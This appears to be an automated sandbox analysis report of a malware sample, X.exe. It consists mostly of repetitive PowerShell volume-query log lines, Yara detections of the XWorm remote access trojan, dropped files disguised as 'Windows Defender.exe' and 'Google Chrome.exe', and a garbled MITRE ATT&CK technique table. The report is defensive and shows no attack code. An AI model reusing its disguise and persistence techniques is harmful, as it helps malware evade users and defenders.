                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Windows Defender.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Windows Defender.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Google Chrome.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Google Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Google Chrome.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected XWorm
                        Source: Yara matchFile source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: X.exe PID: 6696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Windows Defender.exe PID: 2548, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Google Chrome.exe PID: 6568, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected XWorm
                        Source: Yara matchFile source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.X.exe.140f9ac0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: X.exe PID: 6696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Windows Defender.exe PID: 2548, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Google Chrome.exe PID: 6568, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts1
                        Windows Management Instrumentation                        		1
                        Scripting                        		11
                        Process Injection                        		1
                        Masquerading                        		OS Credential Dumping321
                        Security Software Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		11
                        Registry Run Keys / Startup Folder                        		11
                        Registry Run Keys / Startup Folder                        		11
                        Disable or Modify Tools                        		LSASS Memory1
                        Process Discovery                        		Remote Desktop ProtocolData from Removable Media1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		51
                        Virtualization/Sandbox Evasion                        		Security Account Manager51
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture12
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        System Network Configuration Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                        Obfuscated Files or Information                        		Cached Domain Credentials1
                        File and Directory Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                        Software Packing                        		DCSync23
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
